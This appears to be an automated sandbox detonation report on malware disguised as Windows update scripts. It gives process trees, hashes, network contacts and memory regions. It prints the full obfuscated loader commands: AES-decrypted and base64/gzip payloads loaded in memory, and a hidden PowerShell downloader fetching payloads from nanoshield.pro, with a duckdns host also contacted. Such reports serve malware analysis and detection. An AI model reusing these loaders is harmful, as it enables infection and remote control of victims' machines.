PID 5084 wrote to memory of 1020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1020 wrote to memory of 1880 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1020 wrote to memory of 1880 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1020 wrote to memory of 1880 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5084 wrote to memory of 692 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 5084 wrote to memory of 692 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 5084 wrote to memory of 404 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 5084 wrote to memory of 404 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 404 wrote to memory of 1548 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 404 wrote to memory of 1548 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 404 wrote to memory of 1548 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\windows_update\update.cmd"

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\update.cmd

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\update.cmd';$LILq='LGNGQoGNGQadGNGQ'.Replace('GNGQ', ''),'ElevbZPmvbZPenvbZPtvbZPAvbZPtvbZP'.Replace('vbZP', ''),'InUMsVvoUMsVkUMsVeUMsV'.Replace('UMsV', ''),'CopFijyyTFijyoFijy'.Replace('Fijy', ''),'CZakhhaZakhnZakhgeEZakhxtZakhenZakhsZakhioZakhnZakh'.Replace('Zakh', ''),'ReyUhbayUhbdyUhbLiyUhbnesyUhb'.Replace('yUhb', ''),'SOZpUplOZpUitOZpU'.Replace('OZpU', ''),'TrMlaCanMlaCsMlaCfMlaCoMlaCrMlaCmFiMlaCnalMlaCBlMlaCockMlaC'.Replace('MlaC', ''),'MaXOkGiXOkGnXOkGModXOkGulXOkGeXOkG'.Replace('XOkG', ''),'EnkMdetrykMdePokMdeinkMdetkMde'.Replace('kMde', ''),'FrwpnfomwpnfBawpnfse6wpnf4Stwpnfrwpnfingwpnf'.Replace('wpnf', ''),'GemcvPtCmcvPurmcvPrmcvPenmcvPtPrmcvPocmcvPessmcvP'.Replace('mcvP', ''),'DecxpgKoxpgKmxpgKpxpgKresxpgKsxpgK'.Replace('xpgK', ''),'CrtTyceattTycetTycDetTyccrtTycypttTycortTyc'.Replace('tTyc', '');powershell -w hidden;function aPNpf($nVNGI){$htbMs=[System.Security.Cryptography.Aes]::Create();$htbMs.Mode=[System.Security.Cryptography.CipherMode]::CBC;$htbMs.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$htbMs.Key=[System.Convert]::($LILq[10])('/MlRmzNe+ZzBdBywbWhCQRBk9F+NMckIyZTwiuahK6M=');$htbMs.IV=[System.Convert]::($LILq[10])('XI44fhXZ241HbBx9GSgTSw==');$jJhvE=$htbMs.($LILq[13])();$EHnru=$jJhvE.($LILq[7])($nVNGI,0,$nVNGI.Length);$jJhvE.Dispose();$htbMs.Dispose();$EHnru;}function vSJcW($nVNGI){$EemcA=New-Object System.IO.MemoryStream(,$nVNGI);$NFsIp=New-Object System.IO.MemoryStream;$lBDbC=New-Object System.IO.Compression.GZipStream($EemcA,[IO.Compression.CompressionMode]::($LILq[12]));$lBDbC.($LILq[3])($NFsIp);$lBDbC.Dispose();$EemcA.Dispose();$NFsIp.Dispose();$NFsIp.ToArray();}$HrliX=[System.IO.File]::($LILq[5])([Console]::Title);$cGEtH=vSJcW (aPNpf ([Convert]::($LILq[10])([System.Linq.Enumerable]::($LILq[1])($HrliX, 5).Substring(2))));$IdyPm=vSJcW (aPNpf ([Convert]::($LILq[10])([System.Linq.Enumerable]::($LILq[1])($HrliX, 6).Substring(2))));[System.Reflection.Assembly]::($LILq[0])([byte[]]$IdyPm).($LILq[9]).($LILq[2])($null,$null);[System.Reflection.Assembly]::($LILq[0])([byte[]]$cGEtH).($LILq[9]).($LILq[2])($null,$null); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dbxcjp.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command "$Epbiwzhzg = Get-Content 'C:\Users\Admin\AppData\Local\Temp\dbxcjp.bat' | select-object -Last 1; $Pidhuf = [System.Convert]::FromBase64String($Epbiwzhzg);$Kfgkov = New-Object System.IO.MemoryStream( , $Pidhuf );$Rtzup = New-Object System.IO.MemoryStream;$Hvtlgiqv = New-Object System.IO.Compression.GzipStream $Kfgkov, ([IO.Compression.CompressionMode]::Decompress);$Hvtlgiqv.CopyTo( $Rtzup );$Hvtlgiqv.Close();$Kfgkov.Close();[byte[]] $Pidhuf = $Rtzup.ToArray();[Array]::Reverse($Pidhuf); $Ujrulpn = [System.Threading.Thread]::GetDomain().Load($Pidhuf); $Gkwzgehresm = $Ujrulpn.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qiygww.cmd" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command "$Lqctry = Get-Content 'C:\Users\Admin\AppData\Local\Temp\qiygww.cmd' | select-object -Last 1; $Gepinqdfw = [System.Convert]::FromBase64String($Lqctry);$Smjhpgfd = New-Object System.IO.MemoryStream( , $Gepinqdfw );$Ebvvkvbqat = New-Object System.IO.MemoryStream;$Ouefwyswci = New-Object System.IO.Compression.GzipStream $Smjhpgfd, ([IO.Compression.CompressionMode]::Decompress);$Ouefwyswci.CopyTo( $Ebvvkvbqat );$Ouefwyswci.Close();$Smjhpgfd.Close();[byte[]] $Gepinqdfw = $Ebvvkvbqat.ToArray();[Array]::Reverse($Gepinqdfw); $Tyossrcg = [System.Threading.Thread]::GetDomain().Load($Gepinqdfw); $Tzmchvhv = $Tyossrcg.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mfgpgc.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ixgyed.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command "$Wogaptd = Get-Content 'C:\Users\Admin\AppData\Local\Temp\ixgyed.bat' | select-object -Last 1; $Bbvjyjl = [System.Convert]::FromBase64String($Wogaptd);$Osqqdzvqkq = New-Object System.IO.MemoryStream( , $Bbvjyjl );$Ooivncxsvx = New-Object System.IO.MemoryStream;$Ouqoommak = New-Object System.IO.Compression.GzipStream $Osqqdzvqkq, ([IO.Compression.CompressionMode]::Decompress);$Ouqoommak.CopyTo( $Ooivncxsvx );$Ouqoommak.Close();$Osqqdzvqkq.Close();[byte[]] $Bbvjyjl = $Ooivncxsvx.ToArray();[Array]::Reverse($Bbvjyjl); $Bjklpyasha = [System.Threading.Thread]::GetDomain().Load($Bbvjyjl); $Pldyxr = $Bjklpyasha.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"

Network

Country Destination Domain Proto
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 216.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
NL 23.62.61.113:443 www.bing.com tcp
US 8.8.8.8:53 113.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 jdokds.duckdns.org udp
GB 57.128.155.22:8895 jdokds.duckdns.org tcp
US 8.8.8.8:53 22.155.128.57.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 145.136.73.23.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_soxeb2uu.sji.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82


C:\Users\Admin\AppData\Local\Temp\dbxcjp.bat

MD5 7834dbd67492fa350447dbd5debda5fc
SHA1 e008dff36158beb0425d32036d9f65d5653184bd
SHA256 d96f10a2672eb846ecb66d836dfe82933aca60094a367a90eee3aac0444a5573
SHA512 02ac02dfd61f1ce96f79899523aedd6efd26a269bfecf4507ad3008fa384f9f2d9c9fac71664f7f0b1f6bdf6a397ee6757c199c0971f0b9803409f0c48d7206a


C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 a26df49623eff12a70a93f649776dab7
SHA1 efb53bd0df3ac34bd119adf8788127ad57e53803
SHA256 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512 e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

C:\Users\Admin\AppData\Local\Temp\qiygww.cmd

MD5 f95dfe17a283dbb9301936821032b9a4
SHA1 357edc773d07784e7fd295c2b273305994789fc4
SHA256 22d6876c6b04fb74787a5e0803e62ed9c30cd05340ac0eb18ca358c916c3165c
SHA512 2a423ab3c92945600ef1ecc73e0e5ae46c69971b812985b46706b2447b7da1a259a3411e98ffea034aa6cc0880c154bd804785484bf9355357815d1c066d8de8


C:\Users\Admin\AppData\Local\Temp\mfgpgc.bat

MD5 b73dc1ad88598d67c62f694c382be267
SHA1 7a5574b1e22e860e71c47104a588cfbcc78f9a63
SHA256 6ee076cc6d3be85fbb81e4d42276af43fcf3be7445de87d6e0497c9993ca2687
SHA512 d3afb4291432110a063be5506c4d96a82247fa666338e9ce02f19cb3d112118d65a1c1e83947cbe914f10c484f196172cf032e015b4ab00b3a08cca0c1aab675


C:\Users\Admin\AppData\Local\Temp\ixgyed.bat

MD5 a27d0d05a470dc95f1c74c7861761e9f
SHA1 c4533a4822975c7a6316e375e365df82676dce76
SHA256 3efe939bbca5c286978f8695ddeda122222cac8aef1c53ab8a63007e5a3287b7
SHA512 7b3fb05433f58375e1d127f767ccd2cbc90cdce3651127db03d87867cf840002405aeaccebf16c2d1f6242e56b9fc8932210c7f194ecb8204ff1c3616b45409f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 def29ac8e5cffef459c3d64d6bb18fb2
SHA1 ab64966735208644930daf81af0fde24993d7d20
SHA256 1fc6235ced7ccb482365969ccf76b6e54ed12fb3bb09a7bd37e2fa161a09fe57
SHA512 c62966b63c9d7706beb01c9e29b014c2a10307a06defbb3d0137d7af97f211e87140098617a30f1dc0637f9b0e7d008d5f9b88a8cf2c78d3f97450aa77efef45


Analysis: behavioral17

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win7-20240215-en

Max time kernel

121s

Max time network

123s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\update.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\update.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = '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';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.indabid/selif/orp.dleihsonan//:sptth', '1', 'Adobe'))}}"

Network

Country Destination Domain Proto
US 8.8.8.8:53 nanoshd.pro udp
US 8.8.8.8:53 nanoshield.pro udp
US 104.21.37.30:443 nanoshield.pro tcp

Files


C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N49VBC6DQ5BB7A5T25YX.temp

MD5 67bbe7e09328fc2471b8d522d32e9df8
SHA1 a572e8c7f62262893b7fdaddb456853fa8747df4
SHA256 d15c9016f579b6c3f48705edd42ae087efdfc1c07a3ee7f7540c8266aaf319f2
SHA512 8bc81074d9d25db83f692381baeb4056e5b46f6a277ab9a05059daeb6fb9300fe2b81f2b690550f3bb9a2c84ee4111356342569e0ffb9c997c09bf9ea4cd10db


Analysis: behavioral15

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win7-20231129-en

Max time kernel

119s

Max time network

121s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\windows_update\update.cmd"

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 836 wrote to memory of 2312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 836 wrote to memory of 2312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 836 wrote to memory of 2312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 836 wrote to memory of 2372 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 836 wrote to memory of 2372 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 836 wrote to memory of 2372 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2372 wrote to memory of 1124 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2372 wrote to memory of 1124 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2372 wrote to memory of 1124 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2372 wrote to memory of 2044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2372 wrote to memory of 2044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2372 wrote to memory of 2044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2372 wrote to memory of 2380 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2372 wrote to memory of 2380 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2372 wrote to memory of 2380 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\windows_update\update.cmd"

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\update.cmd

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\update.cmd';$LILq='LGNGQoGNGQadGNGQ'.Replace('GNGQ', ''),'ElevbZPmvbZPenvbZPtvbZPAvbZPtvbZP'.Replace('vbZP', ''),'InUMsVvoUMsVkUMsVeUMsV'.Replace('UMsV', ''),'CopFijyyTFijyoFijy'.Replace('Fijy', ''),'CZakhhaZakhnZakhgeEZakhxtZakhenZakhsZakhioZakhnZakh'.Replace('Zakh', ''),'ReyUhbayUhbdyUhbLiyUhbnesyUhb'.Replace('yUhb', ''),'SOZpUplOZpUitOZpU'.Replace('OZpU', ''),'TrMlaCanMlaCsMlaCfMlaCoMlaCrMlaCmFiMlaCnalMlaCBlMlaCockMlaC'.Replace('MlaC', ''),'MaXOkGiXOkGnXOkGModXOkGulXOkGeXOkG'.Replace('XOkG', ''),'EnkMdetrykMdePokMdeinkMdetkMde'.Replace('kMde', ''),'FrwpnfomwpnfBawpnfse6wpnf4Stwpnfrwpnfingwpnf'.Replace('wpnf', ''),'GemcvPtCmcvPurmcvPrmcvPenmcvPtPrmcvPocmcvPessmcvP'.Replace('mcvP', ''),'DecxpgKoxpgKmxpgKpxpgKresxpgKsxpgK'.Replace('xpgK', ''),'CrtTyceattTycetTycDetTyccrtTycypttTycortTyc'.Replace('tTyc', '');powershell -w hidden;function aPNpf($nVNGI){$htbMs=[System.Security.Cryptography.Aes]::Create();$htbMs.Mode=[System.Security.Cryptography.CipherMode]::CBC;$htbMs.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$htbMs.Key=[System.Convert]::($LILq[10])('/MlRmzNe+ZzBdBywbWhCQRBk9F+NMckIyZTwiuahK6M=');$htbMs.IV=[System.Convert]::($LILq[10])('XI44fhXZ241HbBx9GSgTSw==');$jJhvE=$htbMs.($LILq[13])();$EHnru=$jJhvE.($LILq[7])($nVNGI,0,$nVNGI.Length);$jJhvE.Dispose();$htbMs.Dispose();$EHnru;}function vSJcW($nVNGI){$EemcA=New-Object System.IO.MemoryStream(,$nVNGI);$NFsIp=New-Object System.IO.MemoryStream;$lBDbC=New-Object System.IO.Compression.GZipStream($EemcA,[IO.Compression.CompressionMode]::($LILq[12]));$lBDbC.($LILq[3])($NFsIp);$lBDbC.Dispose();$EemcA.Dispose();$NFsIp.Dispose();$NFsIp.ToArray();}$HrliX=[System.IO.File]::($LILq[5])([Console]::Title);$cGEtH=vSJcW (aPNpf ([Convert]::($LILq[10])([System.Linq.Enumerable]::($LILq[1])($HrliX, 5).Substring(2))));$IdyPm=vSJcW (aPNpf ([Convert]::($LILq[10])([System.Linq.Enumerable]::($LILq[1])($HrliX, 6).Substring(2))));[System.Reflection.Assembly]::($LILq[0])([byte[]]$IdyPm).($LILq[9]).($LILq[2])($null,$null);[System.Reflection.Assembly]::($LILq[0])([byte[]]$cGEtH).($LILq[9]).($LILq[2])($null,$null); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Network

N/A

Files


Analysis: behavioral25

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win7-20240221-en

Max time kernel

119s

Max time network

124s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\windows.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\windows.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = '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';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.Acddgoi/selif/orp.dleihsonan//:sptth', '1', 'Adobe'))}}"

Network

Country Destination Domain Proto
US 8.8.8.8:53 nanoshd.pro udp
US 8.8.8.8:53 nanoshield.pro udp
US 172.67.203.108:443 nanoshield.pro tcp

Files


C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WN54W9QYDH7SV6P2RPM7.temp

MD5 e54a3dae0ebf5e9a1a83f9349e73d978
SHA1 d482945d5f50abbd8fc26ec617de0aa2ca75507d
SHA256 21d8f68917b146ca3407b74ab7f62afa33652d52c667b5ec664310fe5de19aee
SHA512 ae9a0ff56cc39a5d768ce747bc181e59b86c53d21d3bd8e614d42cbcb029446f4cf59ecfd9b5b678e71b58db4bc5e9af3c667bd9f2ed71b418fd7d6808a67c7f

memory/2568-10-0x00000000029E0000-0x0000000002A60000-memory.dmp

memory/2440-17-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp

memory/2440-18-0x0000000002650000-0x00000000026D0000-memory.dmp

memory/2440-19-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp

memory/2440-21-0x0000000002650000-0x00000000026D0000-memory.dmp

memory/2440-20-0x0000000002650000-0x00000000026D0000-memory.dmp

memory/2568-22-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp

memory/2568-23-0x00000000029E0000-0x0000000002A60000-memory.dmp

memory/2568-24-0x00000000029E0000-0x0000000002A60000-memory.dmp

memory/2568-25-0x00000000029E0000-0x0000000002A60000-memory.dmp

memory/2440-26-0x000000001AAB0000-0x000000001AAFE000-memory.dmp

memory/2440-27-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp

memory/2568-28-0x00000000029E0000-0x0000000002A60000-memory.dmp

memory/2568-29-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win7-20240221-en

Max time kernel

118s

Max time network

123s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\loader.ps1

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\loader.ps1

Network

N/A

Files

memory/3068-4-0x000000001B2B0000-0x000000001B592000-memory.dmp

memory/3068-6-0x000007FEF5990000-0x000007FEF632D000-memory.dmp

memory/3068-5-0x00000000024D0000-0x00000000024D8000-memory.dmp

memory/3068-7-0x0000000002660000-0x00000000026E0000-memory.dmp

memory/3068-8-0x0000000002660000-0x00000000026E0000-memory.dmp

memory/3068-9-0x0000000002660000-0x00000000026E0000-memory.dmp

memory/3068-10-0x000007FEF5990000-0x000007FEF632D000-memory.dmp

memory/3068-11-0x0000000002660000-0x00000000026E0000-memory.dmp

memory/3068-12-0x000007FEF5990000-0x000007FEF632D000-memory.dmp

memory/3068-13-0x0000000002660000-0x00000000026E0000-memory.dmp

memory/3068-14-0x0000000002660000-0x00000000026E0000-memory.dmp

memory/3068-15-0x0000000002660000-0x00000000026E0000-memory.dmp

memory/3068-16-0x000007FEF5990000-0x000007FEF632D000-memory.dmp

memory/3068-17-0x0000000002660000-0x00000000026E0000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win7-20240221-en

Max time kernel

146s

Max time network

124s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\monitors.ps1

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\monitors.ps1

Network

N/A

Files

memory/2104-4-0x000000001B390000-0x000000001B672000-memory.dmp

memory/2104-5-0x00000000023E0000-0x00000000023E8000-memory.dmp

memory/2104-6-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

memory/2104-7-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

memory/2104-9-0x0000000002260000-0x00000000022E0000-memory.dmp

memory/2104-8-0x0000000002260000-0x00000000022E0000-memory.dmp

memory/2104-10-0x0000000002260000-0x00000000022E0000-memory.dmp

memory/2104-11-0x0000000002260000-0x00000000022E0000-memory.dmp

memory/2104-12-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

memory/2104-13-0x0000000002260000-0x00000000022E0000-memory.dmp

memory/2104-14-0x0000000002260000-0x00000000022E0000-memory.dmp

